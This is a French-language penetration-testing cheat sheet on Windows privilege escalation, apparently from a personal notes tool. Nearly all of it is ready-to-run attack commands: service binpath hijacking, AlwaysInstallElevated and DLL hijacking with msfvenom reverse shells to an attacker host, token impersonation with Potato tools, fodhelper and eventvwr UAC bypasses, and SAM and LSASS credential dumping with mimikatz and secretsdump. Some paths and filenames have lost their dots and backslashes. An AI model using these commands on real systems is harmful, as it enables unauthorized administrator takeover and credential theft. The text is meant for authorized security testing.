MDstable
NoteSnippetChecklistPlaybook

Privilege Escalation Windows

Élévation de privilèges sur systèmes Windows

snippetadvanced 2025-05-10 2 min read
privescwindowsuactokenalwaysinstallelevated
00 Pre-engagement01 Recon02 Scanning03 Enumeration04 Exploitation05 Post-expl.06 Reporting

Énumération automatique

bash
# WinPEAS
winPEASx64exe
# PowerUp (PowerSploit)
Import-Module PowerUpps1
Invoke-AllChecks
# Seatbelt
Seatbeltexe -group=all

Informations système

bash
systeminfo
whoami /all
net user
net localgroup administrators

Services vulnérables

bash
Variables
{{SERVICE_NAME}}
{{USER}}
# Services modifiables
sc qc {{SERVICE_NAME}}
accesschkexe -uwcqv "Authenticated Users" 
# Modifier le binaire path
sc config {{SERVICE_NAME}} binpath "cmd.exe /c net localgroup administrators {{USER}} /add"
sc stop {{SERVICE_NAME}}
sc start {{SERVICE_NAME}}
# Unquoted service path
wmic service get namedisplaynamepathnamestartmode | findstr /i "auto" | findstr /i /v "C:\Windows"

AlwaysInstallElevated

bash
Variables
{{LHOST}}
{{LPORT}}
# Vérifier les clés registry
reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
# Si les deux = 1, générer un MSI malveillant :
msfvenom -p windows/x64/shell_reverse_tcp LHOST{{LHOST}} LPORT{{LPORT}} -f msi -o shellmsi
# Exécuter côté cible :
msiexec /quiet /qn /i CTempshellmsi

Token Impersonation

bash
Variables
{{LPORT}}
# Dans meterpreter :
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
# PrintSpoofer (SeImpersonatePrivilege)
PrintSpoofer64exe -i -c cmd
# Juicy Potato (Windows < 2019)
JuicyPotatoexe -l {{LPORT}} -p cmdexe -t  -c clsid
# GodPotato
GodPotato-NET4.exe -cmd "cmd /c whoami"

UAC Bypass

bash
# Fodhelper bypass
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
# Eventvwr bypass
$cmd  "cmd /c start cmd.exe"
New-Item "HKCU:\Software\Classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\mscfile\shell\open\command" "(default)" $cmd
Start-Process "eventvwr.exe"

DLL Hijacking

bash
Variables
{{LHOST}}
{{LPORT}}
{{APP}}
# Trouver des DLL manquantes
procmonexe  # filtrer sur "NAME NOT FOUND" + ".dll"
# Générer une DLL malveillante
msfvenom -p windows/x64/shell_reverse_tcp LHOST{{LHOST}} LPORT{{LPORT}} -f dll -o hijackdll
# Copier dans le répertoire writable
copy hijackdll CProgram Files{{APP}}missingdll

Credentials stockés

bash
Variables
{{DOMAIN}}
{{USER}}
# Windows Credential Manager
cmdkey /list
# Utiliser les creds stockés
runas /savecred /user{{DOMAIN}}{{USER}} cmdexe
# SAM dump (si SYSTEM)
reg save HKLMSAM CTempSAM
reg save HKLMSYSTEM CTempSYSTEM
# Côté attaquant :
python3 impacket/secretsdump.py -sam SAM -system SYSTEM LOCAL
# LSASS dump
mimikatzexe
privilegedebug
sekurlsalogonpasswords
# Task Scheduler creds
schtasks /query /fo LIST /v | findstr /i "task\|run as"

Passwords dans les fichiers

bash
findstr /si password xml ini txt config 2>nul
dir /s /b pass  cred  vnc  config 2>nul
⚠ Attention —

Les techniques d'élévation de privilèges laissent des traces dans les event logs Windows. Documenter chaque étape pour le rapport.

OPS·BRAIN v1.075 notes · Securitylocal